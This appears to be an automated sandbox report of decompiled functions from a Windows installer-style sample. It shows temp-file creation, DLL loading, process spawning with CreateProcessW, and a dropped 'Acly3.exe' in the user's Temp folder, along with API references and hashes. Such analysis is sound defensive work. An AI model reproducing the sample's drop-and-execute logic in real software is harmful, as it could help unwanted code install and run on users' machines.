                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\Acly3.exe
                                                                            • API String ID: 1941528284-400902675
                                                                            • Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                                            • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                                            • Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                                            • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0040689A(intOrPtr _a4) {
                                                                            				short _v576;
                                                                            				signed int _t13;
                                                                            				struct HINSTANCE__* _t17;
                                                                            				signed int _t19;
                                                                            				void* _t24;
                                                                            
                                                                            				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                                                                            				if(_t13 > 0x104) {
                                                                            					_t13 = 0;
                                                                            				}
                                                                            				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                                                                            					_t19 = 1;
                                                                            				} else {
                                                                            					_t19 = 0;
                                                                            				}
                                                                            				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                                                                            				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                                                                            				return _t17;
                                                                            			}









                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                            • wsprintfW.USER32 ref: 004068EC
                                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                            • API String ID: 2200240437-1946221925
                                                                            • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                            • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                                            • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                            • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 59%
                                                                            			E00401C43(intOrPtr __edx) {
                                                                            				int _t29;
                                                                            				long _t30;
                                                                            				signed int _t32;
                                                                            				WCHAR* _t35;
                                                                            				long _t36;
                                                                            				int _t41;
                                                                            				signed int _t42;
                                                                            				int _t46;
                                                                            				int _t56;
                                                                            				intOrPtr _t57;
                                                                            				struct HWND__* _t63;
                                                                            				void* _t64;
                                                                            
                                                                            				_t57 = __edx;
                                                                            				_t29 = E00402D84(3);
                                                                            				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                            				 *(_t64 - 0x18) = _t29;
                                                                            				_t30 = E00402D84(4);
                                                                            				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                            				 *(_t64 + 8) = _t30;
                                                                            				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                                            					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                                            				}
                                                                            				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                                            				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                                            					 *(_t64 + 8) = E00402DA6(0x44);
                                                                            				}
                                                                            				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                                            				_push(1);
                                                                            				if(__eflags != 0) {
                                                                            					_t61 = E00402DA6();
                                                                            					_t32 = E00402DA6();
                                                                            					asm("sbb ecx, ecx");
                                                                            					asm("sbb eax, eax");
                                                                            					_t35 =  ~( *_t31) & _t61;
                                                                            					__eflags = _t35;
                                                                            					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
                                                                            					goto L10;
                                                                            				} else {
                                                                            					_t63 = E00402D84();
                                                                            					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                            					_t41 = E00402D84(2);
                                                                            					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                            					_t56 =  *(_t64 - 0x1c) >> 2;
                                                                            					if(__eflags == 0) {
                                                                            						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                                            						L10:
                                                                            						 *(_t64 - 0x38) = _t36;
                                                                            					} else {
                                                                            						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                                            						asm("sbb eax, eax");
                                                                            						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                            					}
                                                                            				}
                                                                            				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                                            				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                                            					_push( *(_t64 - 0x38));
                                                                            					E00406484();
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
                                                                            				return 0;
                                                                            			}
















                                                                            APIs
                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessageSend$Timeout
                                                                            • String ID: !
                                                                            • API String ID: 1777923405-2657877971
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                            				intOrPtr _v8;
                                                                            				short _v12;
                                                                            				short _t12;
                                                                            				intOrPtr _t13;
                                                                            				signed int _t14;
                                                                            				WCHAR* _t17;
                                                                            				signed int _t19;
                                                                            				signed short _t23;
                                                                            				WCHAR* _t26;
                                                                            
                                                                            				_t26 = _a4;
                                                                            				_t23 = 0x64;
                                                                            				while(1) {
                                                                            					_t12 =  *L"nsa"; // 0x73006e
                                                                            					_t23 = _t23 - 1;
                                                                            					_v12 = _t12;
                                                                            					_t13 =  *0x40a57c; // 0x61
                                                                            					_v8 = _t13;
                                                                            					_t14 = GetTickCount();
                                                                            					_t19 = 0x1a;
                                                                            					_v8 = _v8 + _t14 % _t19;
                                                                            					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                                                                            					if(_t17 != 0) {
                                                                            						break;
                                                                            					}
                                                                            					if(_t23 != 0) {
                                                                            						continue;
                                                                            					} else {
                                                                            						 *_t26 =  *_t26 & _t23;
                                                                            					}
                                                                            					L4:
                                                                            					return _t17;
                                                                            				}
                                                                            				_t17 = _t26;
                                                                            				goto L4;
                                                                            			}













                                                                            APIs
                                                                            • GetTickCount.KERNEL32(74EDD4C4,C:\Users\user\AppData\Local\Temp\,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040607A
                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CountFileNameTempTick
                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                            • API String ID: 1716503409-4262883142
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
                                                                            			E004015C1(short __ebx, void* __eflags) {
                                                                            				void* _t17;
                                                                            				int _t23;
                                                                            				void* _t25;
                                                                            				signed char _t26;
                                                                            				short _t28;
                                                                            				short _t31;
                                                                            				short* _t34;
                                                                            				void* _t36;
                                                                            
                                                                            				_t28 = __ebx;
                                                                            				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                                                                            				_t17 = E00405EB7(_t16);
                                                                            				_t32 = _t17;
                                                                            				if(_t17 != __ebx) {
                                                                            					do {
                                                                            						_t34 = E00405E39(_t32, 0x5c);
                                                                            						_t31 =  *_t34;
                                                                            						 *_t34 = _t28;
                                                                            						if(_t31 != _t28) {
                                                                            							L5:
                                                                            							_t25 = E00405AEB( *(_t36 + 8));
                                                                            						} else {
                                                                            							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                                                                            							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
                                                                            								goto L5;
                                                                            							} else {
                                                                            								_t25 = E00405A6E( *(_t36 + 8));
                                                                            							}
                                                                            						}
                                                                            						if(_t25 != _t28) {
                                                                            							if(_t25 != 0xb7) {
                                                                            								L9:
                                                                            								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                            							} else {
                                                                            								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                                                                            								if((_t26 & 0x00000010) == 0) {
                                                                            									goto L9;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						 *_t34 = _t31;
                                                                            						_t32 = _t34 + 2;
                                                                            					} while (_t31 != _t28);
                                                                            				}
                                                                            				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                                                                            					_push(0xfffffff5);
                                                                            					E00401423();
                                                                            				} else {
                                                                            					E00401423(0xffffffe6);
                                                                            					E0040653D(0x441000,  *(_t36 + 8));
                                                                            					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                                                                            					if(_t23 == 0) {
                                                                            						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                                                                            					}
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
                                                                            				return 0;
                                                                            			}












                                                                            APIs
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(?), ref: 00405EC5
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                                                                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                                                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                              • Part of subcall function 00405A6E: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                                                                            • SetCurrentDirectoryW.KERNELBASE(?,00441000,?,00000000,000000F0), ref: 0040164D
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                            • String ID:
                                                                            • API String ID: 1892508949-0
                                                                            • Opcode ID: 910828d5dc37494165d7f50429289ef459ba46965d2e72ee7da512ab8f93a7ae
                                                                            • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
                                                                            • Opcode Fuzzy Hash: 910828d5dc37494165d7f50429289ef459ba46965d2e72ee7da512ab8f93a7ae
                                                                            • Instruction Fuzzy Hash: 3E11D031504110EBCF216FA5CD4099F36A0EF25369B28493BE945B52F1DA3E4A829A8E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 69%
                                                                            			E00401389(signed int _a4) {
                                                                            				intOrPtr* _t6;
                                                                            				void* _t8;
                                                                            				void* _t10;
                                                                            				signed int _t11;
                                                                            				void* _t12;
                                                                            				signed int _t16;
                                                                            				signed int _t17;
                                                                            				void* _t18;
                                                                            
                                                                            				_t17 = _a4;
                                                                            				while(_t17 >= 0) {
                                                                            					_t6 = _t17 * 0x1c +  *0x434f30;
                                                                            					if( *_t6 == 1) {
                                                                            						break;
                                                                            					}
                                                                            					_push(_t6); // executed
                                                                            					_t8 = E00401434(); // executed
                                                                            					if(_t8 == 0x7fffffff) {
                                                                            						return 0x7fffffff;
                                                                            					}
                                                                            					_t10 = E0040136D(_t8);
                                                                            					if(_t10 != 0) {
                                                                            						_t11 = _t10 - 1;
                                                                            						_t16 = _t17;
                                                                            						_t17 = _t11;
                                                                            						_t12 = _t11 - _t16;
                                                                            					} else {
                                                                            						_t12 = _t10 + 1;
                                                                            						_t17 = _t17 + 1;
                                                                            					}
                                                                            					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                            						 *0x433eec =  *0x433eec + _t12;
                                                                            						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x433eec, 0x7530,  *0x433ed4), 0);
                                                                            					}
                                                                            				}
                                                                            				return 0;
                                                                            			}











                                                                            APIs
                                                                            • MulDiv.KERNEL32 ref: 004013E4
                                                                            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                            • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                                            • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                                            • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Window$EnableShow
                                                                            • String ID:
                                                                            • API String ID: 1136574915-0
                                                                            • Opcode ID: 300667c7eaa95d67315d557d7665ac0848badbe8e60ad8e587faadf3b7ab87e2
                                                                            • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                                                            • Opcode Fuzzy Hash: 300667c7eaa95d67315d557d7665ac0848badbe8e60ad8e587faadf3b7ab87e2
                                                                            • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00405B20(WCHAR* _a4) {
                                                                            				struct _PROCESS_INFORMATION _v20;
                                                                            				int _t7;
                                                                            
                                                                            				0x430270->cb = 0x44;
                                                                            				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x430270,  &_v20); // executed
                                                                            				if(_t7 != 0) {
                                                                            					CloseHandle(_v20.hThread);
                                                                            					return _v20.hProcess;
                                                                            				}
                                                                            				return _t7;
                                                                            			}





                                                                            APIs
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000), ref: 00405B49
                                                                            • CloseHandle.KERNEL32(?), ref: 00405B56
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID:
                                                                            • API String ID: 3712363035-0
                                                                            • Opcode ID: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                                                            • Instruction ID: 0547baa0b497a95b6ed0e8f273b1969b1ac2c9598ef2001c301bcde660c6e2d6
                                                                            • Opcode Fuzzy Hash: 4cad7792158b69fc064c933527736888f22fedd2346a68a48c9e5725d4d2403f
                                                                            • Instruction Fuzzy Hash: 3EE092B4600209BFEB10AB64AE49F7B7AACEB04704F004565BA51E61A1DB78E8158A78
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0040690A(signed int _a4) {
                                                                            				struct HINSTANCE__* _t5;
                                                                            				signed int _t10;
                                                                            
                                                                            				_t10 = _a4 << 3;
                                                                            				_t8 =  *(_t10 + 0x40a3e0);
                                                                            				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                                                                            				if(_t5 != 0) {
                                                                            					L2:
                                                                            					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                                                                            				}
                                                                            				_t5 = E0040689A(_t8); // executed
                                                                            				if(_t5 == 0) {
                                                                            					return 0;
                                                                            				}
                                                                            				goto L2;
                                                                            			}





                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                              • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                              • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                                              • Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                            • String ID:
                                                                            • API String ID: 2547128583-0
                                                                            • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                            • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                                            • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                                            • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 68%
                                                                            			E0040602D(WCHAR* _a4, long _a8, long _a12) {
                                                                            				signed int _t5;
                                                                            				void* _t6;
                                                                            
                                                                            				_t5 = GetFileAttributesW(_a4); // executed
                                                                            				asm("sbb ecx, ecx");
                                                                            				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                            				return _t6;
                                                                            			}





                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406053
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: File$AttributesCreate
                                                                            • String ID:
                                                                            • API String ID: 415043291-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00406008(WCHAR* _a4) {
                                                                            				signed char _t3;
                                                                            				signed char _t7;
                                                                            
                                                                            				_t3 = GetFileAttributesW(_a4); // executed
                                                                            				_t7 = _t3;
                                                                            				if(_t7 != 0xffffffff) {
                                                                            					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                                            				}
                                                                            				return _t7;
                                                                            			}






                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E00405AEB(WCHAR* _a4) {
                                                                            				int _t2;
                                                                            
                                                                            				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                                            				if(_t2 == 0) {
                                                                            					return GetLastError();
                                                                            				}
                                                                            				return 0;
                                                                            			}





                                                                            APIs
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                                            • GetLastError.KERNEL32 ref: 00405AFF
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1375471231-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004060DF(void* _a4, void* _a8, long _a12) {
                                                                            				int _t7;
                                                                            				long _t11;
                                                                            
                                                                            				_t11 = _a12;
                                                                            				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                            				if(_t7 == 0 || _t11 != _a12) {
                                                                            					return 0;
                                                                            				} else {
                                                                            					return 1;
                                                                            				}
                                                                            			}






                                                                            APIs
                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 004060F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004060B0(void* _a4, void* _a8, long _a12) {
                                                                            				int _t7;
                                                                            				long _t11;
                                                                            
                                                                            				_t11 = _a12;
                                                                            				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                            				if(_t7 == 0 || _t11 != _a12) {
                                                                            					return 0;
                                                                            				} else {
                                                                            					return 1;
                                                                            				}
                                                                            			}






                                                                            APIs
                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 004060C4
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E004034E5(long _a4) {
                                                                            				long _t2;
                                                                            
                                                                            				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                            				return _t2;
                                                                            			}





                                                                            APIs
                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • API ID: FilePointer
                                                                            • String ID:
                                                                            • API String ID: 973152223-0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 78%
                                                                            			E00401FA4(void* __ecx) {
                                                                            				void* _t9;
                                                                            				intOrPtr _t13;
                                                                            				void* _t15;
                                                                            				void* _t17;
                                                                            				void* _t20;
                                                                            				void* _t22;
                                                                            
                                                                            				_t17 = __ecx;
                                                                            				_t19 = E00402DA6(_t15);
                                                                            				E0040559F(0xffffffeb, _t7);
                                                                            				_t9 = E00405B20(_t19); // executed
                                                                            				_t20 = _t9;
                                                                            				if(_t20 == _t15) {
                                                                            					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                            				} else {
                                                                            					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                                                                            						_t13 = E004069B5(_t17, _t20);
                                                                            						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                                                                            							if(_t13 != _t15) {
                                                                            								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                            							}
                                                                            						} else {
                                                                            							E00406484( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                                                            						}
                                                                            					}
                                                                            					_push(_t20);
                                                                            					CloseHandle();
                                                                            				}
                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t22 - 4));
                                                                            				return 0;
                                                                            			}










                                                                            APIs
                                                                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,?,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,?,74EC110C,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                              • Part of subcall function 0040559F: lstrcatW.KERNEL32 ref: 004055FA
                                                                              • Part of subcall function 0040559F: SetWindowTextW.USER32 ref: 0040560C
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                              • Part of subcall function 00405B20: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,00000000), ref: 00405B49
                                                                              • Part of subcall function 00405B20: CloseHandle.KERNEL32(?), ref: 00405B56
                                                                            • CloseHandle.KERNEL32(?), ref: 00401FEB
                                                                              • Part of subcall function 004069B5: WaitForSingleObject.KERNEL32(?,00000064), ref: 004069C6
